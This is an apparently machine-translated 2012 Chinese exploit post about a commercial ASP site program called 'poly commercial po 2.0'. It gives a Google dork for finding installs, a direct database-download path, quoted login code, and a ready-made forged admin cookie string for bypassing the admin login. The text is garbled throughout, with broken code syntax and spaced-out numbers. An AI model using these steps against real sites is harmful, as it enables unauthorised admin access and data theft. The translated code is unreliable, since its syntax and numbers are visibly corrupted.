Polyethylene commercial po-2. 0 storm the library and cookies spoof of defect and repair-vulnerability warning-the black bar safety net

2012-04-07T00:00:00
ID MYHACK58:62201233582
Type myhack58
Reporter 佚名
Modified 2012-04-07T00:00:00

Description

Program: A commercial po-2. 0

google keywords: intext:technical support: Ben Ming technology poly commercial po

A few days ago met a program called poly commercial treasure, the source code download here, today only have time to simple looked......

Vulnerability: violent library as well as the background cookies cheat

1 direct access to the conn/conn. asp storm out of the address database, download, decrypt, sign in the background

  1. the cookies deception, the admin folder under the check. asp file code snippet:

dim uid,upwd www.****. com

uid=Replace_Text(Request. Form("userid"))

upwd=md5(Replace_Text(Request. Form("password")),1 6)

Verifycode=Replace_Text(request. Form"verifycode"))

if not isnumeric(Verifycode) then

Call Logerr()

Call ErroFy()

end if

if Cint(Verifycode)<>Session"SafeCode" is then

Call ErroFy()

Sub ErroFy()

response. write"<table cellpadding=2 cellspacing=1 border=0 width=1 0 0% class=tableBorder align=center>"

response. write"<TR>"

response. write"<TH class=tableHeaderText colSpan=2 height=2 5>appear the error message</TH>"

response. write"<TR><tr><td height=8 5 valign=top class=forumRow><div align=center><br><br>verification code error!& lt;/div></td></tr>"

response. write"<tr align=center><td height=3 0 class=forumRowHighlight><a href='login. asp'><< back</a></td>"

response. write"</tr>"

response. write"</table>"

Response. End()

End Sub

else

Set rs=server. createobject("adodb. recordset")

sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & amp; upwd & "'"

rs. open sqltext,conn,1,1

If Rs. Eof And Rs. Bof Then

response. write"<table cellpadding=2 cellspacing=1 border=0 width=1 0 0% class=tableBorder align=center>"

response. write"<TR>"

response. write"<TH class=tableHeaderText colSpan=2 height=2 5>appear the error message</TH>"

response. write"<TR><tr><td height=8 5 valign=top class=forumRow><div align=center><br><br>login or password incorrect!& lt;/div></td></tr>"

response. write"<tr align=center><td height=3 0 class=forumRowHighlight><a href='login. asp'><< back</a></td>"

response. write"</tr>"

response. write"</table>"

else

Response. Cookies a"globalecmaster")=rs("username")

Response. Cookies a"masterflag")=rs("flag")

Response. Cookies the"adminid"in=rs("id")

LastLogin=Date()

LastLoginIP=getIP()

sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&amp; LastLoginIP&"' where username='"&uid&"'"

conn. execute(sql)

response. write"<table cellpadding=2 cellspacing=1 border=0 width=1 0 0% class=tableBorder align=center>"

response. write"<TR>"

response. write"<TH class=tableHeaderText colSpan=2 height=2 5>login success tips</TH>"

response. write"<TR><tr><td height=8 5 valign=top class=forumRow><div align=center><br><br>successful through the website backstage administrator certification!& lt;br><br>2 seconds after the automatic into the background...</div></td></tr>"

response. write"<tr align=center><td height=3 0 class=forumRowHighlight><a href='index. asp'>enter the backstage management</a></td>"

response. write"</tr>"

response. write"</table>"

%>

<meta HTTP-EQUIV=refresh Content='2;url=index. asp'>

<%

end if

rs. close

set rs=nothing

end if

Use method: use the. D directly access back-end, modify the following cookie, and then access the admin/index. asp login.

globalecmaster=admin; masterflag=0 1%2C%2 0 0 2%2C%2 0 0 3%2C%2 0 0 4%

2C%2 0 0 5%2C%2 0 0 6%2C%2 0 0 7%2C%2 0 0 8%2C%2 0 0 9%2C%2 0 0 1 0; adminid=1